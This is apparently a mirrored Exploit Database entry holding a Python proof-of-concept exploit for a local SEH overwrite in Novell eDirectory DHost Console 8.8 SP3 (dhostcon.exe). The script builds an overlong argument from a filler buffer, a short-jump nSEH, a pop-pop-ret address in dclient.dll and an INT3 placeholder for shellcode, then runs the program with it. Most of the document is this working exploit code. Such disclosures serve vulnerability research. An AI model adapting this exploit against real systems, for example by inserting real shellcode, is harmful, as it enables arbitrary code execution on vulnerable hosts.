Novel eDirectory DHost Console 8.8 SP3 – Local Overwrite (SEH)

• Exploit Database
• 10 阅读

• 作者： d0lc3
  日期： 2010-10-17
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/15267/

• # Exploit Title: 	Novel eDirectory DHost Console 8.8 SP3 Local SEH Overwrite
  # Date: 		17/10/2010 
  # Author: 		d0lc3	 (@rmallof - http://elotrolad0.blogspot.com/)
  # Software Link: 	http://www.novell.com/
  # Version: 		8.8 SP3 (20216.67)]
  # Tested on: 		win32 xp sp3 (spa)
  
  #Summary:
  #	DHostCon.exe is prone to local denial of service caused by stack overflow
  #	triggered if user-supplied parameters are too long (1074 bytes).
  #	Due nature of this vulnerabilty, attackers could exploit this issue
  #	to execute arbitrary code on local host.
  
  #PoC:
  
  #!/usr/bin/python
  import os,struct
  
  def main():
  	path="C:\Novell\NDS\dhostcon.exe"	
  	args="x.x.x.x"				#ip server
  	buf="A"*1065
  	nseh=struct.pack("<L",0x90909eeb)	#jmp short 0012ff50 +NOP + NOP
  	seh=struct.pack("<L",0x61012c20)	#PPR dclient.dll
  	
  	shellcode=struct.pack("<B",0xCC)	#INT3
  
  	crash=buf+shellcode+nseh+seh
  
  	os.system(path+" "+args+" "+crash)	#Crash!
  
  if __name__=="__main__":
  	main()